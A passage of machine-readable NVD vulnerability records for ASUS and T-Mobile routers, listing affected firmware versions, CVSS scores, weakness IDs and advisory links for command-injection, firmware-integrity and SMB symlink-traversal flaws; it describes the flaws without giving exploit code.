{ "criteria": "cpe:2.3:h:asus:rt-ac86u:-:*:*:*:*:*:*:*", "matchCriteriaId": "89095282-ABBD-4056-B731-7F05638DB1A6", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac88u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "91CD50CE-4A9F-420D-A6C6-846790A8B015", "versionEndExcluding": "3.0.0.4.384.10007", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "81008E66-B5E8-4DE5-B14D-E6983C69BC29", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac1900_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E8E6D66-1D74-42EC-83D7-68D45C4E6CDF", "versionEndExcluding": "3.0.0.4.384.10007", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac1900:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E715D86-A7FC-415E-8C13-1ACAF9C49C3A", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac2900_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "0DA924A6-9525-498B-9803-64149D077B0B", "versionEndExcluding": "3.0.0.4.384.10007", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac2900:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2640D39-F0C3-49AA-87D1-F423150FDF2E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac3100_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "A2484D33-5279-433B-A61F-EF91F9499DD5", "versionEndExcluding": "3.0.0.4.384.10007", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac3100:-:*:*:*:*:*:*:*", "matchCriteriaId": "B9B17C2B-A1EC-4FC1-8AB1-F35D9E3A0AA2", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n18u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "470121E9-650D-4183-B03B-CB58110708C5", "versionEndExcluding": "3.0.0.4.382.39935", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n18u:-:*:*:*:*:*:*:*", "matchCriteriaId": "FB744DE5-64DB-4EFF-A23C-EE9BB57A36C4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac87u_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "C4A04F3F-8DF0-4D0A-95DB-DA2004BE280E", "versionEndExcluding": "3.0.0.4.382.50010", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac87u:-:*:*:*:*:*:*:*", "matchCriteriaId": "317B2498-88CE-431F-97E1-EFE7F7E34E05", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac3200_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "532AC95B-6B12-48F2-A556-F1729D10D839", "versionEndExcluding": "3.0.0.4.382.50010", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac3200:-:*:*:*:*:*:*:*", "matchCriteriaId": "AFE8A3B1-284B-40EC-872E-B8F7103F108C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac5300_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "61D77199-A591-4194-95A1-298572A753B4", "versionEndExcluding": "3.0.0.4.384.20287", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac5300:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EE62D6-1E29-4E84-8944-D3D68E212140", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable." }, { "lang": "es", "value": "Main_Analysis_Content.asp en /apply.cgi en dispositivos ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900 y en dispositivos RT-AC3100 en versiones anteriores a la 3.0.0.4.384_10007; dispositivos RT-N18U en versiones anteriores a la 3.0.0.4.382.39935; dispositivos RT-AC87U y RT-AC3200 en versiones anteriores a la 3.0.0.4.382.50010; y dispositivos RT-AC5300 en versiones anteriores a la 3.0.0.4.384.20287 permite la inyecci\u00f3n de comandos del sistema operativo mediante los campos pingCNT y destIP de la variable SystemCmd." } ], "id": "CVE-2018-9285", "lastModified": "2024-11-21T04:15:17.713", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2018-04-04T19:29:00.687", "references": [ { "source": "cve@mitre.org", "url": "http://packetstormsecurity.com/files/160049/ASUS-TM-AC1900-Arbitrary-Command-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://fortiguard.com/zeroday/FG-VD-17-216" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://packetstormsecurity.com/files/160049/ASUS-TM-AC1900-Arbitrary-Command-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://fortiguard.com/zeroday/FG-VD-17-216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-78" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:t-mobile:tm-ac1900:3.0.0.4.376_3169:*:*:*:*:*:*:*", "matchCriteriaId": "919D9673-1FCA-431D-9F30-643AAEFAC1DA", "vulnerable": true } ], "negate": false, "operator": "OR" } ] }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt_series_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "B65300BF-25AB-4130-A6D3-27E673B47630", "versionEndIncluding": "3.0.0.4.374.x", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac56r:*:*:*:*:*:*:*:*", "matchCriteriaId": "F78791C6-23A8-41B6-A886-59A593165B8A", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66r:*:*:*:*:*:*:*:*", "matchCriteriaId": "E0863AD7-F290-4201-BDD9-497C82517C75", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac66u:*:*:*:*:*:*:*:*", "matchCriteriaId": "106D80BC-400A-4996-8A4E-68D3F24B200F", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-ac68u:*:*:*:*:*:*:*:*", "matchCriteriaId": "BDA91183-BE7D-4055-8707-1B11368D4435", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56r:*:*:*:*:*:*:*:*", "matchCriteriaId": "A5E2864C-6D9B-4D00-AB6A-82248DD82210", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n56u:*:*:*:*:*:*:*:*", "matchCriteriaId": "45140849-3F44-4866-850D-195B393F2849", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66r:*:*:*:*:*:*:*:*", "matchCriteriaId": "42BBB86A-961B-4529-8B74-CF6889156AB8", "vulnerable": false }, { "criteria": "cpe:2.3:h:asus:rt-n66u:*:*:*:*:*:*:*:*", "matchCriteriaId": "98F88197-8E64-468C-8F36-281ED8E3716A", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image." }, { "lang": "es", "value": "Los routers ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, y posiblemente otros de la serie RT anterior a firmware 3.0.0.4.376.x no verifica la integridad de (1) informaci\u00f3n de actualizaciones o (2) actualizaciones de descargas del firmware, lo que permite a atacantes man-in-the-middle (MITM) ejecutar c\u00f3digo arbitrario a trav\u00e9s de un imagen manipulado." } ], "id": "CVE-2014-2718", "lastModified": "2024-11-21T02:06:49.693", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 7.1, "confidentialityImpact": "NONE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:C/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ] }, "published": "2014-11-04T22:55:06.417", "references": [ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://packetstormsecurity.com/files/128904/ASUS-Router-Man-In-The-Middle.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "http://seclists.org/fulldisclosure/2014/Oct/122" }, { "source": "cve@mitre.org", "url": "http://www.securityfocus.com/bid/70791" }, { "source": "cve@mitre.org", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316" }, { "source": "cve@mitre.org", "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://packetstormsecurity.com/files/128904/ASUS-Router-Man-In-The-Middle.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "http://seclists.org/fulldisclosure/2014/Oct/122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "http://www.securityfocus.com/bid/70791" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98316" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://support.t-mobile.com/docs/DOC-21994" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-345" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://www.ise.io/casestudies/exploiting-soho-routers/ | Mitigation, Third Party Advisory | |
cve@mitre.org | https://www.ise.io/soho_service_hacks/ | Third Party Advisory | |
cve@mitre.org | https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf | Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.ise.io/casestudies/exploiting-soho-routers/ | Mitigation, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.ise.io/soho_service_hacks/ | Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf | Third Party Advisory |
Vendor | Product | Version | |
---|---|---|---|
asus | rt-ac66u_firmware | - | |
asus | rt-ac66u | - | |
asus | rt-n56u_firmware | - | |
asus | rt-n56u | - |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "8FFDE31E-5C68-4DC7-9B4A-C19F1719CA91", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*", "matchCriteriaId": "1ED39CBC-80ED-4037-9285-4D4CFA45F00E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-n56u_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "30CAB8E5-7FB5-48CD-B68A-1ACE07E8EA8A", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-n56u:-:*:*:*:*:*:*:*", "matchCriteriaId": "534C0C95-9DD2-464C-8776-01B47398FE13", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service." }, { "lang": "es", "value": "Una vulnerabilidad de Salto de Enlace Simb\u00f3lico en ASUS RT-AC66U y RT-N56U debido a una configuraci\u00f3n inapropiada en el servicio SMB." } ], "id": "CVE-2013-4656", "lastModified": "2024-11-21T01:56:00.100", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2019-11-13T15:15:09.963", "references": [ { "source": "cve@mitre.org", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Third Party Advisory" ], "url": "https://www.ise.io/casestudies/exploiting-soho-routers/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.ise.io/soho_service_hacks/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf" } ], "sourceIdentifier": "cve@mitre.org", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-22" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
Vulnerability from fkie_nvd
▼ | URL | Tags | |
---|---|---|---|
cve@mitre.org | https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/ | Product, Vendor Advisory | |
cve@mitre.org | https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch | Exploit, Third Party Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.asus.com/uk/Networking-IoT-Servers/WiFi-Routers/ASUS-WiFi-Routers/RT-AC88U/ | Product, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch | Exploit, Third Party Advisory |
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_xd4s_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "BEDAEEC5-E6E8-457E-8432-FD39D65BDEDC", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_xd4s:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B3B20AB-5861-4E5F-B59E-F12D587D2AEF", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_xt9_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "569711EA-9CBA-4B97-BC4C-B13C93DBB70F", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_xt9:-:*:*:*:*:*:*:*", "matchCriteriaId": "971A3BA4-5093-4B17-BEE6-039B12E3183E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_xd5_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "46EC6E99-DE45-492E-8BC8-8D39018B07AF", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_xd5:-:*:*:*:*:*:*:*", "matchCriteriaId": "AAD83FAE-D0F5-4C4B-B731-A7E28AB38581", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_pro_et12_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "757EEF1F-E574-477F-A2CA-B8B69080EA30", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_pro_et12:-:*:*:*:*:*:*:*", "matchCriteriaId": "126C4415-18E9-4989-88BE-BB46AD0BE096", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi__pro_xt12_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "D186B98E-4255-4D8D-BDDF-D14BD447FA32", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi__pro_xt12:-:*:*:*:*:*:*:*", "matchCriteriaId": "B77BF29C-750A-4305-89BA-D4889875D888", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_ax_hybrid_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "F0790420-3761-420D-B2ED-BD8D1B38A141", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_ax_hybrid:-:*:*:*:*:*:*:*", "matchCriteriaId": "6E5CCBC4-423E-4C96-AF4A-1104ECA2E17B", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_et8_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "52D3F13E-1E01-4B29-B135-F279F802C2AB", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_et8:-:*:*:*:*:*:*:*", "matchCriteriaId": "C0D08073-95DA-426F-94DD-3F820180CC1F", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_xd6_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "106EA3E7-532A-40EB-A138-1C4214956278", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_xd6:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CEAB3EB-28B7-4FB8-9ECA-3A671B51A776", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_ac_mini_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "55D8268F-E64E-4856-9443-0246941DA712", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_ac_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "684A13D8-D0BA-499C-B3E3-E075BE05EABA", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_ax_mini_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "B51D8BA5-6047-4EDB-B642-2068941066F5", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_ax_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "B2B95883-48B9-4182-A721-8EDBF844C480", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_ax_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "7E460687-9C49-40AC-8107-969820F90C51", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_ax:-:*:*:*:*:*:*:*", "matchCriteriaId": "54F3A1C0-2616-4E64-9704-78922DF22477", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:zenwifi_ac_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "662CCFEE-DC9F-450D-BDC8-B185E9CD2DB8", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:zenwifi_ac:-:*:*:*:*:*:*:*", "matchCriteriaId": "09478D87-D059-4C9B-83BB-22D55CFC9DB7", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ac66u_b1_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "960791C1-B456-4DA8-B606-0988977DCE69", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ac66u_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F6B0EC4-797D-4059-AA90-EC09A49FE105", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax88u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "25287F79-2607-402F-879C-920360FAFA76", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax88u:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB91E047-5AE1-4CA0-9E67-84170D79770C", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax82u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "7D226F86-D73A-482A-ABBD-48FDB755D137", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax82u:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D118305-CAFD-425F-8352-3B241D2E7702", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax89x_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "1C9DE7A3-F8B0-4785-ACAE-165F304BFF33", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax89x:-:*:*:*:*:*:*:*", "matchCriteriaId": "F98D091B-BE82-4ED0-BA8F-DECF15A9D119", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax92u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "F9B5A898-D537-4E75-AB7A-B8311F1DF94D", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax92u:-:*:*:*:*:*:*:*", "matchCriteriaId": "8EB70155-390A-472E-A0AA-59A18ADD2BF5", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax86u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "84A5D3AF-D0F6-4B91-9B66-38215156F733", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax86u:-:*:*:*:*:*:*:*", "matchCriteriaId": "AB28700C-02EB-46D0-9BAD-833CE4790264", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax68u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "2C03B276-5913-4EF3-9EE6-2FEA71998FAB", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:asus:rt-ax68u:-:*:*:*:*:*:*:*", "matchCriteriaId": "7E27ED92-86BD-4FDB-A7AF-D308AA4A14DC", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:asus:rt-ax82u_firmware:3.0.0.4.386.46061:*:*:*:*:*:*:*", "matchCriteriaId": "7D226F86-D73A-482A-ABBD-48FDB755D137", "vulnerable": true } ], "negate": 